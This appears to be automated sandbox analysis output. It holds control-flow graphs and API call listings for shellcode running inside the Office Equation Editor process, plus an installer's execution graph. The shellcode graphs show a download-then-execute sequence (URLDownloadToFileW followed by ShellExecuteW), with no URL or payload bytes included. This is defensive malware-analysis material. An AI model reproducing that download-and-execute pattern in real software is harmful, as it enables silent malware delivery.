          control_flow_graph 231 379043f-3790451 ShellExecuteW 233 3790458-3790459 231->233 234 3790453 call 3790464 231->234 235 379045b 233->235 236 37904c4-37904c8 233->236 234->233 239 37904ad 235->239 240 379045d 235->240 237 37904ca 236->237 238 37904cc 236->238 243 37904ce-37904d0 237->243 238->243 244 37904d2-37904db 238->244 241 37904af-37904b3 239->241 242 37904b5-37904b9 239->242 240->243 245 379045f-3790469 ExitProcess 240->245 241->242 246 37904c1 241->246 242->243 247 37904bb-37904bf 242->247 248 37904e0-37904e1 243->248 251 37904dd 244->251 252 37904a4-37904a7 244->252 246->236 247->243 247->246 251->248 252->244 253 37904a9 252->253 253->239
          APIs
          • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03790451
            • Part of subcall function 03790464: ExitProcess.KERNEL32(00000000), ref: 03790469
          Memory Dump Source
          • Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd
          Similarity
          • API ID: ExecuteExitProcessShell
          • String ID:
          • API String ID: 1124553745-0
          • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
          • Instruction ID: df6da15d6dbd5d7abb9966837fd9b099409005ae42e4b511fe98236eb3aa5a3d
          • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
          • Instruction Fuzzy Hash: 61014958975322E1FF30E6287C05BF9AB109B83700FCC8B53B994044F2D19490C3C319
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 255 379042a-379042c 257 3790431-3790437 255->257 258 379042c call 379043f 255->258 259 3790439-3790459 ShellExecuteW call 3790464 257->259 260 379049e-37904aa 257->260 258->257 269 379045b 259->269 270 37904c4-37904c8 259->270 262 37904ad 260->262 263 37904af-37904b3 262->263 264 37904b5-37904b9 262->264 263->264 266 37904c1 263->266 267 37904bb-37904bf 264->267 268 37904ce-37904d0 264->268 266->270 267->266 267->268 273 37904e0-37904e1 268->273 269->262 274 379045d 269->274 271 37904ca 270->271 272 37904cc 270->272 271->268 272->268 275 37904d2-37904db 272->275 274->268 276 379045f-3790469 ExitProcess 274->276 279 37904dd 275->279 280 37904a4-37904a7 275->280 279->273 280->275 281 37904a9 280->281 281->262
          Memory Dump Source
          • Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd
          Similarity
          • API ID: ExecuteExitProcessShell
          • String ID:
          • API String ID: 1124553745-0
          • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
          • Instruction ID: c545204bd08bd5821d024aef2eec947685203153f532566fecef7fa5afaacd46
          • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
          • Instruction Fuzzy Hash: A201442457A302E1FF30E3246C89BEDBA84AB83714FA8866BF594484F2D2948482C21D
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 283 3790464-3790469 ExitProcess
          APIs
          • ExitProcess.KERNEL32(00000000), ref: 03790469
          Memory Dump Source
          • Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd
          Similarity
          • API ID: ExitProcess
          • String ID:
          • API String ID: 621844428-0
          • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
          • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
          • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
          • Instruction Fuzzy Hash:
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 285 379046b-3790476 GetPEB 286 3790479-379048a call 3790493 285->286 289 379048c-3790490 286->289
          Memory Dump Source
          • Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
          • Instruction ID: 0b46816777a20986c4d31584ef61bde720c94fe1239137ffdde7df94ab2623c7
          • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
          • Instruction Fuzzy Hash: BCD05271222502CFEB04DF04E984E12F3AAFFC9611B28C36AE0044B729C330EC92CA90
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 290 37902fd-3790302 ExitProcess 291 3790309-3790324 call 3790332 290->291 292 3790304 call 3790316 290->292 295 3790377-3790396 291->295 296 3790327 291->296 292->291 298 3790398-37903a0 295->298 297 3790329-379032c 296->297 296->298 300 379032f 297->300 301 3790394-3790395 297->301 302 3790331-3790340 300->302 303 37903a4-37903b1 call 37903bc 300->303 301->298 305 37903b2-37903b7 302->305 306 3790342-3790347 302->306 303->305 309 37903ba-37903c3 305->309 306->305 308 3790349 306->308 308->309 311 379034b-379034f 308->311 312 37903c5-37903c7 309->312 311->303 313 3790351 311->313 314 37903cd-3790437 URLDownloadToFileW call 379042a call 379043f 312->314 315 37903c8 call 3790411 312->315 313->312 317 3790353-3790374 call 379038d 313->317 329 3790439-3790459 ShellExecuteW call 3790464 314->329 330 379049e-37904aa 314->330 315->314 317->295 339 379045b 329->339 340 37904c4-37904c8 329->340 332 37904ad 330->332 333 37904af-37904b3 332->333 334 37904b5-37904b9 332->334 333->334 336 37904c1 333->336 337 37904bb-37904bf 334->337 338 37904ce-37904d0 334->338 336->340 337->336 337->338 343 37904e0-37904e1 338->343 339->332 344 379045d 339->344 341 37904ca 340->341 342 37904cc 340->342 341->338 342->338 345 37904d2-37904db 342->345 344->338 346 379045f-3790469 ExitProcess 344->346 349 37904dd 345->349 350 37904a4-37904a7 345->350 349->343 350->345 351 37904a9 350->351 351->332
          APIs
          • ExitProcess.KERNEL32(037902EB), ref: 037902FD
          Memory Dump Source
          • Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd
          Similarity
          • API ID: ExitProcess
          • String ID:
          • API String ID: 621844428-0
          • Opcode ID: ccfd489bce1c0a559d0adf8b208c79d6f7bd7d67aeda824a00c74952255f4900
          • Instruction ID: 556e7556ba1bb89199164925d2b216ce9edfedf90d5c4c7f2d9866842b851371
          • Opcode Fuzzy Hash: ccfd489bce1c0a559d0adf8b208c79d6f7bd7d67aeda824a00c74952255f4900
          • Instruction Fuzzy Hash: 3811E25542DBC08FFB02D7703AAA045FF60BE4F50075C87CFC4C14E1A3D264964A9382
          Uniqueness

          Uniqueness Score: -1.00%

          Execution Graph

          Execution Coverage:16.2%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:16.3%
          Total number of Nodes:1372
          Total number of Limit Nodes:22
          execution_graph 3058 401941 3059 401943 3058->3059 3064 402da6 3059->3064 3065 402db2 3064->3065 3106 4066ab 3065->3106 3068 401948 3070 405d7a 3068->3070 3148 406045 3070->3148 3073 405da2 DeleteFileW 3103 401951 3073->3103 3074 405db9 3076 405ed9 3074->3076 3162 40666e lstrcpynW 3074->3162 3076->3103 3191 4069a4 FindFirstFileW 3076->3191 3077 405ddf 3078 405df2 3077->3078 3079 405de5 lstrcatW 3077->3079 3163 405f89 lstrlenW 3078->3163 3080 405df8 3079->3080 3083 405e08 lstrcatW 3080->3083 3085 405e13 lstrlenW FindFirstFileW 3080->3085 3083->3085 3085->3076 3086 405e35 3085->3086 3089 405ebc FindNextFileW 3086->3089 3099 405d7a 60 API calls 3086->3099 3102 4056d0 24 API calls 3086->3102 3167 40666e lstrcpynW 3086->3167 3168 405d32 3086->3168 3176 4056d0 3086->3176 3187 40642e MoveFileExW 3086->3187 3089->3086 3092 405ed2 FindClose 3089->3092 3090 405d32 5 API calls 3093 405f14 3090->3093 3092->3076 3094 405f18 3093->3094 3095 405f2e 3093->3095 3098 4056d0 24 API calls 3094->3098 3094->3103 3097 4056d0 24 API calls 3095->3097 3097->3103 3100 405f25 3098->3100 3099->3086 3101 40642e 36 API calls 3100->3101 3101->3103 3102->3089 3110 4066b8 3106->3110 3107 4068db 3108 402dd3 3107->3108 3139 40666e lstrcpynW 3107->3139 3108->3068 3123 4068f5 3108->3123 3110->3107 3111 4068a9 lstrlenW 3110->3111 3115 4066ab 10 API calls 3110->3115 3116 4067c0 GetSystemDirectoryW 3110->3116 3117 4067d3 GetWindowsDirectoryW 3110->3117 3118 406802 SHGetSpecialFolderLocation 3110->3118 3119 40684a lstrcatW 3110->3119 3120 4066ab 10 API calls 3110->3120 3121 4068f5 5 API calls 3110->3121 3132 40653c 3110->3132 3137 4065b5 wsprintfW 3110->3137 3138 40666e lstrcpynW 3110->3138 3111->3110 3115->3111 3116->3110 3117->3110 3118->3110 3122 40681a SHGetPathFromIDListW CoTaskMemFree 3118->3122 3119->3110 3120->3110 3121->3110 3122->3110 3124 406902 3123->3124 3126 406978 3124->3126 3127 40696b CharNextW 3124->3127 3130 406957 CharNextW 3124->3130 3131 406966 CharNextW 3124->3131 3144 405f6a 3124->3144 3125 40697d CharPrevW 3125->3126 3126->3125 3128 40699e 3126->3128 3127->3124 3127->3126 3128->3068 3130->3124 3131->3127 3140 4064db 3132->3140 3135 406570 RegQueryValueExW RegCloseKey 3136 4065a0 3135->3136 3136->3110 3137->3110 3138->3110 3139->3108 3141 4064ea 3140->3141 3142 4064f3 RegOpenKeyExW 3141->3142 3143 4064ee 3141->3143 3142->3143 3143->3135 3143->3136 3145 405f70 3144->3145 3146 405f86 3145->3146 3147 405f77 CharNextW 3145->3147 3146->3124 3147->3145 3197 40666e lstrcpynW 3148->3197 3150 406056 3198 405fe8 CharNextW CharNextW 3150->3198 3153 405d9a 3153->3073 3153->3074 3154 4068f5 5 API calls 3160 40606c 3154->3160 3155 40609d lstrlenW 3156 4060a8 3155->3156 3155->3160 3157 405f3d 3 API calls 3156->3157 3159 4060ad GetFileAttributesW 3157->3159 3158 4069a4 2 API calls 3158->3160 3159->3153 3160->3153 3160->3155 3160->3158 3161 405f89 2 API calls 3160->3161 3161->3155 3162->3077 3164 405f97 3163->3164 3165 405fa9 3164->3165 3166 405f9d CharPrevW 3164->3166 3165->3080 3166->3164 3166->3165 3167->3086 3204 406139 GetFileAttributesW 3168->3204 3171 405d5f 3171->3086 3172 405d55 DeleteFileW 3174 405d5b 3172->3174 3173 405d4d RemoveDirectoryW 3173->3174 3174->3171 3175 405d6b SetFileAttributesW 3174->3175 3175->3171 3177 4056eb 3176->3177 3178 40578d 3176->3178 3179 405707 lstrlenW 3177->3179 3180 4066ab 17 API calls 3177->3180 3178->3086 3181 405730 3179->3181 3182 405715 lstrlenW 3179->3182 3180->3179 3184 405743 3181->3184 3185 405736 SetWindowTextW 3181->3185 3182->3178 3183 405727 lstrcatW 3182->3183 3183->3181 3184->3178 3186 405749 SendMessageW SendMessageW SendMessageW 3184->3186 3185->3184 3186->3178 3188 40644f 3187->3188 3189 406442 3187->3189 3188->3086 3207 4062b4 3189->3207 3192 405efe 3191->3192 3193 4069ba FindClose 3191->3193 3192->3103 3194 405f3d lstrlenW CharPrevW 3192->3194 3193->3192 3195 405f08 3194->3195 3196 405f59 lstrcatW 3194->3196 3195->3090 3196->3195 3197->3150 3199 406005 3198->3199 3200 406017 3198->3200 3199->3200 3201 406012 CharNextW 3199->3201 3202 405f6a CharNextW 3200->3202 3203 40603b 3200->3203 3201->3203 3202->3200 3203->3153 3203->3154 3205 405d3e 3204->3205 3206 40614b SetFileAttributesW 3204->3206 3205->3171 3205->3172 3205->3173 3206->3205 3208 4062e4 3207->3208 3209 40630a GetShortPathNameW 3207->3209 3234 40615e GetFileAttributesW CreateFileW 3208->3234 3211 406429 3209->3211 3212 40631f 3209->3212 3211->3188 3212->3211 3214 406327 wsprintfA 3212->3214 3213 4062ee CloseHandle GetShortPathNameW 3213->3211 3215 406302 3213->3215 3216 4066ab 17 API calls 3214->3216 3215->3209 3215->3211 3217 40634f 3216->3217 3235 40615e GetFileAttributesW CreateFileW 3217->3235 3219 40635c 3219->3211 3220 40636b GetFileSize GlobalAlloc 3219->3220 3221 406422 CloseHandle 3220->3221 3222 40638d 3220->3222 3221->3211 3236 4061e1 ReadFile 3222->3236 3227 4063c0 3229 4060c3 4 API calls 3227->3229 3228 4063ac lstrcpyA 3230 4063ce 3228->3230 3229->3230 3231 406405 SetFilePointer 3230->3231 3243 406210 WriteFile 3231->3243 3234->3213 3235->3219 3237 4061ff 3236->3237 3237->3221 3238 4060c3 lstrlenA 3237->3238 3239 406104 lstrlenA 3238->3239 3240 40610c 3239->3240 3241 4060dd lstrcmpiA 3239->3241 3240->3227 3240->3228 3241->3240 3242 4060fb CharNextA 3241->3242 3242->3239 3244 40622e GlobalFree 3243->3244 3244->3221 3245 4015c1 3246 402da6 17 API calls 3245->3246 3247 4015c8 3246->3247 3248 405fe8 4 API calls 3247->3248 3260 4015d1 3248->3260 3249 401631 3251 401663 3249->3251 3252 401636 3249->3252 3250 405f6a CharNextW 3250->3260 3255 401423 24 API calls 3251->3255 3272 401423 3252->3272 3261 40165b 3255->3261 3259 40164a SetCurrentDirectoryW 3259->3261 3260->3249 3260->3250 3262 401617 GetFileAttributesW 3260->3262 3264 405c39 3260->3264 3267 405b9f CreateDirectoryW 3260->3267 3276 405c1c CreateDirectoryW 3260->3276 3262->3260 3279 406a3b GetModuleHandleA 3264->3279 3268 405bf0 GetLastError 3267->3268 3269 405bec 3267->3269 3268->3269 3270 405bff SetFileSecurityW 3268->3270 3269->3260 3270->3269 3271 405c15 GetLastError 3270->3271 3271->3269 3273 4056d0 24 API calls 3272->3273 3274 401431 3273->3274 3275 40666e lstrcpynW 3274->3275 3275->3259 3277 405c30 GetLastError 3276->3277 3278 405c2c 3276->3278 3277->3278 3278->3260 3280 406a61 GetProcAddress 3279->3280 3281 406a57 3279->3281 3283 405c40 3280->3283 3285 4069cb GetSystemDirectoryW 3281->3285 3283->3260 3284 406a5d 3284->3280 3284->3283 3286 4069ed wsprintfW LoadLibraryExW 3285->3286 3286->3284 3760 401c43 3782 402d84 3760->3782 3762 401c4a 3763 402d84 17 API calls 3762->3763 3764 401c57 3763->3764 3765 401c6c 3764->3765 3766 402da6 17 API calls 3764->3766 3767 401c7c 3765->3767 3768 402da6 17 API calls 3765->3768 3766->3765 3769 401cd3 3767->3769 3770 401c87 3767->3770 3768->3767 3771 402da6 17 API calls 3769->3771 3772 402d84 17 API calls 3770->3772 3773 401cd8 3771->3773 3774 401c8c 3772->3774 3775 402da6 17 API calls 3773->3775 3776 402d84 17 API calls 3774->3776 3777 401ce1 FindWindowExW 3775->3777 3778 401c98 3776->3778 3781 401d03 3777->3781 3779 401cc3 SendMessageW 3778->3779 3780 401ca5 SendMessageTimeoutW 3778->3780 3779->3781 3780->3781 3783 4066ab 17 API calls 3782->3783 3784 402d99 3783->3784 3784->3762 3785 405644 3786 405654 3785->3786 3787 405668 3785->3787 3789 4056b1 3786->3789 3790 40565a 3786->3790 3788 405670 IsWindowVisible 3787->3788 3796 405687 3787->3796 3788->3789 3791 40567d 3788->3791 3792 4056b6 CallWindowProcW 3789->3792 3793 404616 SendMessageW 3790->3793 3798 404f85 SendMessageW 3791->3798 3795 405664 3792->3795 3793->3795 3796->3792 3803 405005 3796->3803 3799 404fe4 SendMessageW 3798->3799 3800 404fa8 GetMessagePos ScreenToClient SendMessageW 3798->3800 3801 404fdc 3799->3801 3800->3801 3802 404fe1 3800->3802 3801->3796 3802->3799 3812 40666e lstrcpynW 3803->3812 3805 405018 3813 4065b5 wsprintfW 3805->3813 3807 405022 3808 40140b 2 API calls 3807->3808 3809 40502b 3808->3809 3814 40666e lstrcpynW 3809->3814 3811 405032 3811->3789 3812->3805 3813->3807 3814->3811 3815 4028c4 3816 4028ca 3815->3816 3817 4028d2 FindClose 3816->3817 3818 402c2a 3816->3818 3817->3818 3316 403646 SetErrorMode GetVersionExW 3317 4036d0 3316->3317 3318 403698 GetVersionExW 3316->3318 3319 403729 3317->3319 3320 406a3b 5 API calls 3317->3320 3318->3317 3321 4069cb 3 API calls 3319->3321 3320->3319 3322 40373f lstrlenA 3321->3322 3322->3319 3323 40374f 3322->3323 3324 406a3b 5 API calls 3323->3324 3325 403756 3324->3325 3326 406a3b 5 API calls 3325->3326 3327 40375d 3326->3327 3328 406a3b 5 API calls 3327->3328 3329 403769 #17 OleInitialize SHGetFileInfoW 3328->3329 3406 40666e lstrcpynW 3329->3406 3332 4037b6 GetCommandLineW 3407 40666e lstrcpynW 3332->3407 3334 4037c8 3335 405f6a CharNextW 3334->3335 3336 4037ee CharNextW 3335->3336 3346 4037ff 3336->3346 3337 4038fd 3338 403911 GetTempPathW 3337->3338 3408 403615 3338->3408 3340 403929 3341 403983 DeleteFileW 3340->3341 3342 40392d GetWindowsDirectoryW lstrcatW 3340->3342 3418 4030d0 GetTickCount GetModuleFileNameW 3341->3418 3344 403615 12 API calls 3342->3344 3343 405f6a CharNextW 3343->3346 3347 403949 3344->3347 3346->3337 3346->3343 3350 4038ff 3346->3350 3347->3341 3349 40394d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3347->3349 3348 403996 3351 403b72 ExitProcess OleUninitialize 3348->3351 3355 403a4b 3348->3355 3361 405f6a CharNextW 3348->3361 3354 403615 12 API calls 3349->3354 3503 40666e lstrcpynW 3350->3503 3352 403b82 3351->3352 3353 403b97 3351->3353 3508 405cce 3352->3508 3358 403c15 ExitProcess 3353->3358 3359 403b9f GetCurrentProcess OpenProcessToken 3353->3359 3360 40397b 3354->3360 3447 403d1d 3355->3447 3366 403be5 3359->3366 3367 403bb6 LookupPrivilegeValueW AdjustTokenPrivileges 3359->3367 3360->3341 3360->3351 3372 4039b8 3361->3372 3363 403a5a 3363->3351 3368 406a3b 5 API calls 3366->3368 3367->3366 3371 403bec 3368->3371 3369 403a21 3374 406045 18 API calls 3369->3374 3370 403a62 3373 405c39 5 API calls 3370->3373 3375 403c01 ExitWindowsEx 3371->3375 3376 403c0e 3371->3376 3372->3369 3372->3370 3377 403a67 lstrcatW 3373->3377 3378 403a2d 3374->3378 3375->3358 3375->3376 3512 40140b 3376->3512 3380 403a83 lstrcatW lstrcmpiW 3377->3380 3381 403a78 lstrcatW 3377->3381 3378->3351 3504 40666e lstrcpynW 3378->3504 3380->3363 3382 403aa3 3380->3382 3381->3380 3384 403aa8 3382->3384 3385 403aaf 3382->3385 3387 405b9f 4 API calls 3384->3387 3388 405c1c 2 API calls 3385->3388 3386 403a40 3505 40666e lstrcpynW 3386->3505 3390 403aad 3387->3390 3391 403ab4 SetCurrentDirectoryW 3388->3391 3390->3391 3392 403ad1 3391->3392 3393 403ac6 3391->3393 3507 40666e lstrcpynW 3392->3507 3506 40666e lstrcpynW 3393->3506 3396 4066ab 17 API calls 3397 403b13 DeleteFileW 3396->3397 3398 403b1f CopyFileW 3397->3398 3403 403ade 3397->3403 3398->3403 3399 403b69 3400 40642e 36 API calls 3399->3400 3400->3363 3401 40642e 36 API calls 3401->3403 3402 4066ab 17 API calls 3402->3403 3403->3396 3403->3399 3403->3401 3403->3402 3404 405c51 2 API calls 3403->3404 3405 403b53 CloseHandle 3403->3405 3404->3403 3405->3403 3406->3332 3407->3334 3409 4068f5 5 API calls 3408->3409 3411 403621 3409->3411 3410 40362b 3410->3340 3411->3410 3412 405f3d 3 API calls 3411->3412 3413 403633 3412->3413 3414 405c1c 2 API calls 3413->3414 3415 403639 3414->3415 3515 40618d 3415->3515 3519 40615e GetFileAttributesW CreateFileW 3418->3519 3420 403113 3446 403120 3420->3446 3520 40666e lstrcpynW 3420->3520 3422 403136 3423 405f89 2 API calls 3422->3423 3424 40313c 3423->3424 3521 40666e lstrcpynW 3424->3521 3426 403147 GetFileSize 3427 403246 3426->3427 3429 40315e 3426->3429 3522 40302e 3427->3522 3429->3427 3433 4032e4 3429->3433 3441 40302e 32 API calls 3429->3441 3429->3446 3553 4035e8 3429->3553 3431 403289 GlobalAlloc 3436 40618d 2 API calls 3431->3436 3434 40302e 32 API calls 3433->3434 3434->3446 3437 4032b4 CreateFileW 3436->3437 3439 4032ee 3437->3439 3437->3446 3438 40326a 3440 4035e8 ReadFile 3438->3440 3537 4035fe SetFilePointer 3439->3537 3443 403275 3440->3443 3441->3429 3443->3431 3443->3446 3444 4032fc 3538 403377 3444->3538 3446->3348 3448 406a3b 5 API calls 3447->3448 3449 403d31 3448->3449 3450 403d37 3449->3450 3451 403d49 3449->3451 3581 4065b5 wsprintfW 3450->3581 3452 40653c 3 API calls 3451->3452 3453 403d79 3452->3453 3455 403d98 lstrcatW 3453->3455 3457 40653c 3 API calls 3453->3457 3456 403d47 3455->3456 3573 403ff3 3456->3573 3457->3455 3460 406045 18 API calls 3461 403dca 3460->3461 3462 403e5e 3461->3462 3464 40653c 3 API calls 3461->3464 3463 406045 18 API calls 3462->3463 3465 403e64 3463->3465 3466 403dfc 3464->3466 3467 403e74 LoadImageW 3465->3467 3468 4066ab 17 API calls 3465->3468 3466->3462 3471 403e1d lstrlenW 3466->3471 3475 405f6a CharNextW 3466->3475 3469 403f1a 3467->3469 3470 403e9b RegisterClassW 3467->3470 3468->3467 3474 40140b 2 API calls 3469->3474 3472 403ed1 SystemParametersInfoW CreateWindowExW 3470->3472 3473 403f24 3470->3473 3476 403e51 3471->3476 3477 403e2b lstrcmpiW 3471->3477 3472->3469 3473->3363 3478 403f20 3474->3478 3480 403e1a 3475->3480 3479 405f3d 3 API calls 3476->3479 3477->3476 3481 403e3b GetFileAttributesW 3477->3481 3478->3473 3482 403ff3 18 API calls 3478->3482 3483 403e57 3479->3483 3480->3471 3484 403e47 3481->3484 3485 403f31 3482->3485 3582 40666e lstrcpynW 3483->3582 3484->3476 3487 405f89 2 API calls 3484->3487 3488 403fc0 3485->3488 3489 403f3d ShowWindow 3485->3489 3487->3476 3583 4057a3 OleInitialize 3488->3583 3491 4069cb 3 API calls 3489->3491 3495 403f55 3491->3495 3492 403fc6 3493 403fe2 3492->3493 3496 403fca 3492->3496 3497 40140b 2 API calls 3493->3497 3494 403f63 GetClassInfoW 3499 403f77 GetClassInfoW RegisterClassW 3494->3499 3500 403f8d DialogBoxParamW 3494->3500 3495->3494 3498 4069cb 3 API calls 3495->3498 3496->3473 3501 40140b 2 API calls 3496->3501 3497->3473 3498->3494 3499->3500 3502 40140b 2 API calls 3500->3502 3501->3473 3502->3473 3503->3338 3504->3386 3505->3355 3506->3392 3507->3403 3509 405ce3 3508->3509 3510 403b8f ExitProcess 3509->3510 3511 405cf7 MessageBoxIndirectW 3509->3511 3511->3510 3513 401389 2 API calls 3512->3513 3514 401420 3513->3514 3514->3358 3516 40619a GetTickCount GetTempFileNameW 3515->3516 3517 4061d0 3516->3517 3518 403644 3516->3518 3517->3516 3517->3518 3518->3340 3519->3420 3520->3422 3521->3426 3523 403057 3522->3523 3524 40303f 3522->3524 3527 403067 GetTickCount 3523->3527 3528 40305f 3523->3528 3525 403048 DestroyWindow 3524->3525 3526 40304f 3524->3526 3525->3526 3526->3431 3526->3446 3556 4035fe SetFilePointer 3526->3556 3527->3526 3530 403075 3527->3530 3529 406a77 2 API calls 3528->3529 3529->3526 3531 4030aa CreateDialogParamW ShowWindow 3530->3531 3532 40307d 3530->3532 3531->3526 3532->3526 3557 403012 3532->3557 3534 40308b wsprintfW 3535 4056d0 24 API calls 3534->3535 3536 4030a8 3535->3536 3536->3526 3537->3444 3539 4033a2 3538->3539 3540 403386 SetFilePointer 3538->3540 3560 40347f GetTickCount 3539->3560 3540->3539 3543 40343f 3543->3446 3544 4061e1 ReadFile 3545 4033c2 3544->3545 3545->3543 3546 40347f 38 API calls 3545->3546 3547 4033d9 3546->3547 3547->3543 3548 403445 ReadFile 3547->3548 3550 4033e8 3547->3550 3548->3543 3550->3543 3551 4061e1 ReadFile 3550->3551 3552 406210 WriteFile 3550->3552 3551->3550 3552->3550 3554 4061e1 ReadFile 3553->3554 3555 4035fb 3554->3555 3555->3429 3556->3438 3558 403021 3557->3558 3559 403023 MulDiv 3557->3559 3558->3559 3559->3534 3561 4035d7 3560->3561 3562 4034ad 3560->3562 3563 40302e 32 API calls 3561->3563 3572 4035fe SetFilePointer 3562->3572 3569 4033a9 3563->3569 3565 4034b8 SetFilePointer 3568 4034dd 3565->3568 3566 4035e8 ReadFile 3566->3568 3567 40302e 32 API calls 3567->3568 3568->3566 3568->3567 3568->3569 3570 406210 WriteFile 3568->3570 3571 4035b8 SetFilePointer 3568->3571 3569->3543 3569->3544 3570->3568 3571->3561 3572->3565 3574 404007 3573->3574 3590 4065b5 wsprintfW 3574->3590 3576 404078 3591 4040ac 3576->3591 3578 403da8 3578->3460 3579 40407d 3579->3578 3580 4066ab 17 API calls 3579->3580 3580->3579 3581->3456 3582->3462 3594 404616 3583->3594 3585 4057c6 3589 4057ed 3585->3589 3597 401389 3585->3597 3586 404616 SendMessageW 3587 4057ff OleUninitialize 3586->3587 3587->3492 3589->3586 3590->3576 3592 4066ab 17 API calls 3591->3592 3593 4040ba SetWindowTextW 3592->3593 3593->3579 3595 40462e 3594->3595 3596 40461f SendMessageW 3594->3596 3595->3585 3596->3595 3599 401390 3597->3599 3598 4013fe 3598->3585 3599->3598 3600 4013cb MulDiv SendMessageW 3599->3600 3600->3599 3601 4040cb 3602 4040e3 3601->3602 3603 404244 3601->3603 3602->3603 3606 4040ef 3602->3606 3604 404295 3603->3604 3605 404255 GetDlgItem GetDlgItem 3603->3605 3608 4042ef 3604->3608 3620 401389 2 API calls 3604->3620 3694 4045ca 3605->3694 3609 4040fa SetWindowPos 3606->3609 3610 40410d 3606->3610 3614 404616 SendMessageW 3608->3614 3621 40423f 3608->3621 3609->3610 3611 404116 ShowWindow 3610->3611 3612 404158 3610->3612 3615 404231 3611->3615 3616 404136 GetWindowLongW 3611->3616 3617 404160 DestroyWindow 3612->3617 3618 404177 3612->3618 3613 40427f SetClassLongW 3619 40140b 2 API calls 3613->3619 3622 404301 3614->3622 3680 404631 3615->3680 3616->3615 3623 40414f ShowWindow 3616->3623 3624 404574 3617->3624 3625 40417c SetWindowLongW 3618->3625 3626 40418d 3618->3626 3619->3604 3627 4042c7 3620->3627 3629 40140b 2 API calls 3622->3629 3630 404555 DestroyWindow EndDialog 3622->3630 3635 4066ab 17 API calls 3622->3635 3646 4045ca 18 API calls 3622->3646 3649 4045ca 18 API calls 3622->3649 3623->3612 3624->3621 3633 404584 ShowWindow 3624->3633 3625->3621 3626->3615 3631 404199 GetDlgItem 3626->3631 3627->3608 3632 4042cb SendMessageW 3627->3632 3629->3622 3630->3624 3634 4041aa SendMessageW IsWindowEnabled 3631->3634 3636 4041c7 3631->3636 3632->3621 3633->3621 3634->3621 3634->3636 3635->3622 3637 4041d4 3636->3637 3638 4041e7 3636->3638 3639 40421b SendMessageW 3636->3639 3647 4041cc 3636->3647 3637->3639 3637->3647 3641 404204 3638->3641 3642 4041ef 3638->3642 3639->3615 3645 40140b 2 API calls 3641->3645 3644 40140b 2 API calls 3642->3644 3643 404202 3643->3615 3644->3647 3648 40420b 3645->3648 3646->3622 3677 4045a3 3647->3677 3648->3615 3648->3647 3650 40437c GetDlgItem 3649->3650 3651 404391 3650->3651 3652 404399 ShowWindow EnableWindow 3650->3652 3651->3652 3697 4045ec EnableWindow 3652->3697 3654 4043c3 EnableWindow 3659 4043d7 3654->3659 3655 4043dc GetSystemMenu EnableMenuItem SendMessageW 3656 40440c SendMessageW 3655->3656 3655->3659 3656->3659 3658 4040ac 18 API calls 3658->3659 3659->3655 3659->3658 3698 4045ff SendMessageW 3659->3698 3699 40666e lstrcpynW 3659->3699 3661 40443b lstrlenW 3662 4066ab 17 API calls 3661->3662 3663 404451 SetWindowTextW 3662->3663 3664 401389 2 API calls 3663->3664 3666 404462 3664->3666 3665 404495 DestroyWindow 3665->3624 3667 4044af CreateDialogParamW 3665->3667 3666->3621 3666->3622 3666->3665 3668 404490 3666->3668 3667->3624 3669 4044e2 3667->3669 3668->3621 3670 4045ca 18 API calls 3669->3670 3671 4044ed GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3670->3671 3672 401389 2 API calls 3671->3672 3673 404533 3672->3673 3673->3621 3674 40453b ShowWindow 3673->3674 3675 404616 SendMessageW 3674->3675 3676 404553 3675->3676 3676->3624 3678 4045b0 SendMessageW 3677->3678 3679 4045aa 3677->3679 3678->3643 3679->3678 3681 404649 GetWindowLongW 3680->3681 3682 4046f4 3680->3682 3681->3682 3683 40465e 3681->3683 3682->3621 3683->3682 3684 40468b GetSysColor 3683->3684 3685 40468e 3683->3685 3684->3685 3686 404694 SetTextColor 3685->3686 3687 40469e SetBkMode 3685->3687 3686->3687 3688 4046b6 GetSysColor 3687->3688 3689 4046bc 3687->3689 3688->3689 3690 4046c3 SetBkColor 3689->3690 3691 4046cd 